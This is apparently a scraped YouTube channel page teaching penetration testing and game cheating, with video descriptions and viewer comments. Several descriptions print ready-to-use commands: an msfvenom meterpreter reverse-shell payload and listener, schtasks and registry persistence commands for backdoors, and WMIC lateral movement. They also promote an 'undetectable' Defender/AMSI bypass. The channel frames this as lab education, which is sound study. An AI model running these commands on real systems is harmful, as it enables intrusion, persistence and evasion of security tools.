Exploit Academy
Exploit Academy
  • 31
  • 265 312
Unrestricted File Upload - How to Exploit Web Servers (With DVWA)
In this video we look at exploiting DVWA by leveraging file upload vulnerabilities. Learn how to bypass the low, medium, and high setting in DVWA.
All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed
unless you have permission to do so. These videos are to be performed
within a virtual lab for ethical hacking education only. We are not responsible for any misuse, damages, and or loss of data due to misuse
of this information.
มุมมอง: 3 032

วีดีโอ

Command Injection - How to Exploit Web Servers (With DVWA)
มุมมอง 6K2 ปีที่แล้ว
In this video, we're going to be talking about command injection. This is a security vulnerability that allows someone to inject commands into web applications, which can then be executed by the server. Although command injection is not a new vulnerability, it is one that is becoming more and more common in web applications. In this video, we're going to be discussing ways to exploit command in...
How to bypass Windows 11/10 Defender with Hoaxhsell & AmsiTrigger [UNDETECTED]
มุมมอง 21K2 ปีที่แล้ว
In this video, we'll show you how to bypass Windows 11/10 Defender with Hoaxhsell & AmsiTrigger. These tools are undetectable and can be used to hack into any computer! AmsiTrigger: github.com/RythmStick/AMSITrigger Hoaxshell: github.com/t3l3machus/hoaxshell All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed u...
How to use Scheduled Tasks for Persistence w/ Kali Linux
มุมมอง 1.3K2 ปีที่แล้ว
Learn how to maintain access in a windows machine by creating a scheduled task that will execute your payload every minute! Enjoy! Command: schtasks /create /tn NAME /tr PAYLOAD /sc SCHEDULE /mo VALUE All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed unless you have permission to do so. These videos are to be...
How to use the Windows Registry for Persistence w/ Kali Linux
มุมมอง 1.9K2 ปีที่แล้ว
In this video we look at maintaining access to a windows host by abusing the windows registry to automatically execute a reverse shell back to our kali box. Enjoy! Commands: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run \V NAME -d "C:\PAYLOAD" /F Where "NAME" is the name of the registry key, and "PAYLOAD" is the location that points to your backdoor / payload. All material provided...
How to Pivot (Lateral Movement) in Active Directory Using SCM
มุมมอง 1K2 ปีที่แล้ว
In this video we look at how to pivot within an Active Directory network environment using SCM otherwise known as Windows Service Control Manager. Commands ran in video: to create the payload: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe-service -o ~/Desktop/testservice.exe to create a listener: 1. msfconsole 2. use exploit/multi/handler 3. set LHOST YOUR IP 4. set...
How to Pivot (Lateral Movement) in Active Directory Using Scheduled Tasks
มุมมอง 4242 ปีที่แล้ว
Learn how to pivot inside of an Active Directory (AD) environment by leveraging scheduled tasks to your advantage! Commands: Schtasks /create /s \\192.168.232.124 /tn test /sc once /td 01/01/2000 /ts 00:00 /ru system /tr “C:\setup.exe” To execute the task: Schtasks /s \\192.168.232.134 /run /tn "C:\setup.exe" Enjoy! All material provided on this video and this channel is intended for informatio...
How to Pivot (Lateral Movement) in Active Directory Using WMIC
มุมมอง 3.8K2 ปีที่แล้ว
Learn how to pivot hosts using WMIC. Command to copy executable to target: copy payload \\target\ (example: copy backdoor.exe \\192.168.1.100\c$) Command to execute payload on target: wmic /node:"target" process call create "\\target\payload\" (example : wmic /node:"192.168.1.100" process call create "\\192.168.1.100\c$\backdoor.exe") (example: copy backdoor.exe 192.168.1.100) Link to FREE wind...
UnrealIRC 3.2.8.1 Remote Code Execution (CVE-2010-2075) with Manual and Metasploit Examples
มุมมอง 2.9K2 ปีที่แล้ว
UnrealIRC version 3.2.8.1 vulnerability exploitation. This video shows you how to recreate this exploit both manually and by using Metasploit. More on UnrealIRC: en.wikipedia.org/wiki/UnrealIRCd link to GitHub for the script used in the video: github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor Link for Metasploitable VM: sourceforge.net/projects/metasploitable/ Link for Kali Linux: www.kali....
DistCC 1.0.0 Remote Code Execution (CVE-2004-2687) with Manual and Metasploit Examples
มุมมอง 2.3K2 ปีที่แล้ว
Distcc v1 RCE vulnerability exploitation. This video shows you how to recreate this exploit both manually and by using Metasploit. "distcc is a program to distribute builds of C, C , Objective C or Objective C code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile."...
Samba 3.0.20 Arbitrary Command Execution (CVE-2007-2447) with Manual and Metasploit Examples
มุมมอง 4.1K2 ปีที่แล้ว
Hacking Samba 3.0.20 - 3.0.25rc3 using the usermap_script exploit for vulnerability CVE-2007-2447. This video shows you how to recreate this exploit both manually and by using Metasploit. link to GitHub for the script used in the video: github.com/amriunix/CVE-2007-2447 Link for Metasploitable VM: sourceforge.net/projects/metasploitable/ Link for Kali Linux: www.kali.org/get-kali/ *DISCLAIMER* ...
vsFTPd v2.3.4 Backdoor Command Execution (CVE-2011-2523) with Manual & Metasploit Examples
มุมมอง 11K2 ปีที่แล้ว
Hacking vsFTPd v2.3.4 both manually and with Metasploit. This tutorial is short and straight to the point to help with OSCP and entry level hackers alike. Help support my channel by leaving a like, comment, and subscribe for more! *DISCLAIMER* All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed unless you have ...
Scanning with Nmap Tutorial
มุมมอง 6245 ปีที่แล้ว
Scanning with Nmap Tutorial
How to Install Parrot OS on VirtualBox (Easy Tutorial)
มุมมอง 4.1K5 ปีที่แล้ว
How to Install Parrot OS on VirtualBox (Easy Tutorial)
HOW TO REMOTELY HACK ANDROIDS (Easiest Method!)
มุมมอง 2.6K6 ปีที่แล้ว
HOW TO REMOTELY HACK ANDROIDS (Easiest Method!)
HOW TO CREATE BACKDOORS WITH MSFVENOM (REMOTE ACCESS ANY DEVICE)
มุมมอง 2.5K6 ปีที่แล้ว
HOW TO CREATE BACKDOORS WITH MSFVENOM (REMOTE ACCESS ANY DEVICE)
HOW TO HACK MORE EFFICIENTLY BY USING TERMINATOR
มุมมอง 4916 ปีที่แล้ว
HOW TO HACK MORE EFFICIENTLY BY USING TERMINATOR
BEGINNER TIPS FOR RUNNING KALI LINUX INSIDE OF VIRTUALBOX
มุมมอง 1726 ปีที่แล้ว
BEGINNER TIPS FOR RUNNING KALI LINUX INSIDE OF VIRTUALBOX
HOW TO INSTALL KALI LINUX 2018 ON VIRTUALBOX IN 5 MINUTES
มุมมอง 3.1K6 ปีที่แล้ว
HOW TO INSTALL KALI LINUX 2018 ON VIRTUALBOX IN 5 MINUTES
HOW TO SPEEDHACK IN ANY GAME
มุมมอง 26K6 ปีที่แล้ว
HOW TO SPEEDHACK IN ANY GAME
HOW TO HACK RAPID FIRE
มุมมอง 14K6 ปีที่แล้ว
HOW TO HACK RAPID FIRE
HOW TO ORGANIZE YOUR CHEAT TABLE IN CHEAT ENGINE
มุมมอง 2.6K6 ปีที่แล้ว
HOW TO ORGANIZE YOUR CHEAT TABLE IN CHEAT ENGINE
HOW TO TELEPORT IN ANY GAME
มุมมอง 9K6 ปีที่แล้ว
HOW TO TELEPORT IN ANY GAME
HOW TO FIND STATIC ADDRESSES WITH CHEAT ENGINE
มุมมอง 117K6 ปีที่แล้ว
HOW TO FIND STATIC ADDRESSES WITH CHEAT ENGINE
HOW TO SETUP AND USE HOTKEYS IN CHEAT ENGINE
มุมมอง 15K6 ปีที่แล้ว
HOW TO SETUP AND USE HOTKEYS IN CHEAT ENGINE
HOW TO FIND VALUES FASTER WITH DATA STRUCTURES
มุมมอง 2.8K6 ปีที่แล้ว
HOW TO FIND VALUES FASTER WITH DATA STRUCTURES
HOW TO SCAN AND EDIT MEMORY IN GAMES (DYNAMIC ADRESSES)
มุมมอง 3.7K6 ปีที่แล้ว
HOW TO SCAN AND EDIT MEMORY IN GAMES (DYNAMIC ADRESSES)
WHAT YOU NEED TO START HACKING GAMES (EASY)
มุมมอง 9736 ปีที่แล้ว
WHAT YOU NEED TO START HACKING GAMES (EASY)
HOW TO HACK ANY GAME WITH CHEAT ENGINE ► DATA TYPES FOR SCANNING
มุมมอง 2K6 ปีที่แล้ว
HOW TO HACK ANY GAME WITH CHEAT ENGINE ► DATA TYPES FOR SCANNING

ความคิดเห็น

  • @joel9909
    @joel9909 3 วันที่ผ่านมา

    The Metasploit works when i login twice. It first says wrong credentials but works on the second try

  • @gordonfrost-ni4cl
    @gordonfrost-ni4cl 4 วันที่ผ่านมา

    HTML5 Universal Speed Hack

  • @XenolVlatriX
    @XenolVlatriX 5 วันที่ผ่านมา

    How can i escalate to root from here?

  • @XenolVlatriX
    @XenolVlatriX 6 วันที่ผ่านมา

    You have been of great help for my university class! Sad to see you are not posting anymore :(

  • @Deepak25R
    @Deepak25R 13 วันที่ผ่านมา

    well explained !!!

  • @XenolVlatriX
    @XenolVlatriX 20 วันที่ผ่านมา

    hi when i exploit i have an error saying exploit completed, no session was created. i already ran nc -lvp 4444 though. would you help please.

  • @BZ-nb2rh
    @BZ-nb2rh หลายเดือนก่อน

    are only some pointer values static and dont change? seems all pointer scan values change, any workarounds?

  • @harze6818
    @harze6818 หลายเดือนก่อน

    Can you show without admin privileges

  • @rojenrai1719
    @rojenrai1719 หลายเดือนก่อน

    How to find command execution and ping page in other website beside dvwa.

  • @catsandmountains
    @catsandmountains หลายเดือนก่อน

    Thank you! So clean, succinct, and to the point.

  • @ITZTHEDEANN
    @ITZTHEDEANN หลายเดือนก่อน

    pointer path 0 not sure what to do

  • @mohamadamora8866
    @mohamadamora8866 2 หลายเดือนก่อน

    But you can not solve it in that way man !! you must only stick with high and file upload section only

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 2 หลายเดือนก่อน

    Shalom.

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 2 หลายเดือนก่อน

    Shalom.

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 2 หลายเดือนก่อน

    Very informative! Very beginner-friendly! Shalom. :3

  • @eggsec-i4s
    @eggsec-i4s 2 หลายเดือนก่อน

    Thank you for the explanation. I wonder if we can just try to login into the tmp share and send the payload as the user and listen back for the reverse connection?

  • @kirindev
    @kirindev 4 หลายเดือนก่อน

    thank you.

  • @Lethemusicheal
    @Lethemusicheal 4 หลายเดือนก่อน

    Can I ask you Question how a hacker will found the IP Address of the Domain Controller

  • @timecop1983Two
    @timecop1983Two 4 หลายเดือนก่อน

    amazing this guy is a pro hacker

  • @timecop1983Two
    @timecop1983Two 4 หลายเดือนก่อน

    Please make more videos don't give up! 😥

  • @timecop1983Two
    @timecop1983Two 4 หลายเดือนก่อน

    Thanks so easy peasy!

  • @cybersecurity4052
    @cybersecurity4052 4 หลายเดือนก่อน

    there is a very limited amount of content creators out there. which makes what you do even more important. thank you for all that you do.

  • @hroldddp
    @hroldddp 4 หลายเดือนก่อน

    I did this on health, but it works on other entities too. How do I fix it?

    • @hroldddp
      @hroldddp 4 หลายเดือนก่อน

      nvm it was easy fix

  • @MrT3K_Innovator
    @MrT3K_Innovator 5 หลายเดือนก่อน

    Setup.exe is on your desktop and you copy the file from the shell? How did you do that?

    • @Vrory77
      @Vrory77 4 หลายเดือนก่อน

      The Setup.exe is already at : C:\Users\John.doe thats why he could easy copy from the Windows-Client to the DC. Most ITs have that locked that Files are open to read so thats why some fileshare which everyone can read/write/execute are really importen to find a vurability.

  • @爱情白痴仔
    @爱情白痴仔 5 หลายเดือนก่อน

    hi ! i am trying to find the static address for pes2021,but i always get zero list when i rescan memory with a new dynamic address.do you know the reason for this weird situation?

  • @daleowen92
    @daleowen92 5 หลายเดือนก่อน

    why'd you stop making videos my guy. you make things make sense. appreciate all the vids you've made so far

  • @fluidmind3629
    @fluidmind3629 5 หลายเดือนก่อน

    but when you open the game again the adres i diferent p-> different... why ? where is the static one to copy and use in vb ? thanks

  • @howardduck7066
    @howardduck7066 6 หลายเดือนก่อน

    Nice walkthrough!

  • @Jamaal_Ahmed
    @Jamaal_Ahmed 6 หลายเดือนก่อน

    Thanks bro after 1 year , susbribed ❤🎉 .

  • @DatoXaindrava
    @DatoXaindrava 7 หลายเดือนก่อน

    can u make speedhack or something hack in prime tank pls bro i need :( pls make me happy

  • @KamalnathReddyRamireddygari
    @KamalnathReddyRamireddygari 7 หลายเดือนก่อน

    More videos brohhh....loving your content .

  • @KamalnathReddyRamireddygari
    @KamalnathReddyRamireddygari 7 หลายเดือนก่อน

    this video needs a million likes brohh! Thank you, it is crystal clear

  • @timecop1983Two
    @timecop1983Two 7 หลายเดือนก่อน

    Amazing!!! What don't you make a Udemy course and get more benefit!

  • @sagisar
    @sagisar 7 หลายเดือนก่อน

    Very good video. Anyway I would thank you really much if you can explain the Python script part by part because I want to understand how exactly this RCE is made of, didn’t found in the internet a full explanation of the vulnerability

  • @scahrahmoosh
    @scahrahmoosh 7 หลายเดือนก่อน

    Bro make video on genshin. Hk like teleport chast esp open

  • @dotajames91
    @dotajames91 8 หลายเดือนก่อน

    this one should be in Cheat Engine main tutorial

  • @sankalp9
    @sankalp9 8 หลายเดือนก่อน

    Wow , this was amazing!! i have been struggling with povoting and have gone through a lot of resources just to end up even more confused😅... but your video made things straight and this technique is going to be part of my arsenal for a very long time , thank you for the work that you do it is quite inspiring ❤️

  • @Md.HusseinSabid
    @Md.HusseinSabid 8 หลายเดือนก่อน

    What setting are required for a pc with 8gb ROM and 4 cores?

  • @kartheekkandalam2274
    @kartheekkandalam2274 8 หลายเดือนก่อน

    Hi, Thanks for the complete walkthrough.... For Medium security, Please give me an another way to exploit without using Burpsuite like tools..... Unfortunately my university VM is not opening burpsuite and I need to know if there is any other way to do without an external tool?

  • @basealchemist4396
    @basealchemist4396 8 หลายเดือนก่อน

    This video was a great help. This should be reccomended at the top

  • @darryls6388
    @darryls6388 8 หลายเดือนก่อน

    When I run the reg add command, I’m getting “You must specify a keyboath (-k) I’m assuming that’s the key value for the added registry. How do I get that value incorporated into the command for this to work for me?

  • @raulrivero1944
    @raulrivero1944 9 หลายเดือนก่อน

    I love the video 🎉

  • @fawadbaloch8695
    @fawadbaloch8695 9 หลายเดือนก่อน

    it helps me to undestand the concept

  • @ihebmahmoud6753
    @ihebmahmoud6753 9 หลายเดือนก่อน

    is there any alternative way without wasting time and effort

    • @BZ-nb2rh
      @BZ-nb2rh หลายเดือนก่อน

      lol did you find a method?

    • @ihebmahmoud6753
      @ihebmahmoud6753 หลายเดือนก่อน

      @@BZ-nb2rhyes just join unknown cheat community they upload all the offsets of all the games for free

  • @harze6818
    @harze6818 9 หลายเดือนก่อน

    i get the error check if real time protection is on. which IT IS ! i dont know what to do i tried running as admin aswell and i tried the executionpolicy unrestricted nothing works

    • @harze6818
      @harze6818 9 หลายเดือนก่อน

      which its not i mean*

  • @ekwewilliam5035
    @ekwewilliam5035 9 หลายเดือนก่อน

    THANK YOU VERY MUCH YOU ARE THE BEST ❤❤❤❤❤❤❤❤ +1 SUB

  • @naiacnc3173
    @naiacnc3173 9 หลายเดือนก่อน

    muchas gracias 😉

  • @alirezahhh8
    @alirezahhh8 10 หลายเดือนก่อน

    It worked, thank you very much, it was great

  • @toshirokirito489
    @toshirokirito489 10 หลายเดือนก่อน

    im new subscriber this video almost 5 years and working and tested thank you

  • @bird271828
    @bird271828 11 หลายเดือนก่อน

    Nice video. It would have been more useful if you could show how to escalate daemon's privileges to become root.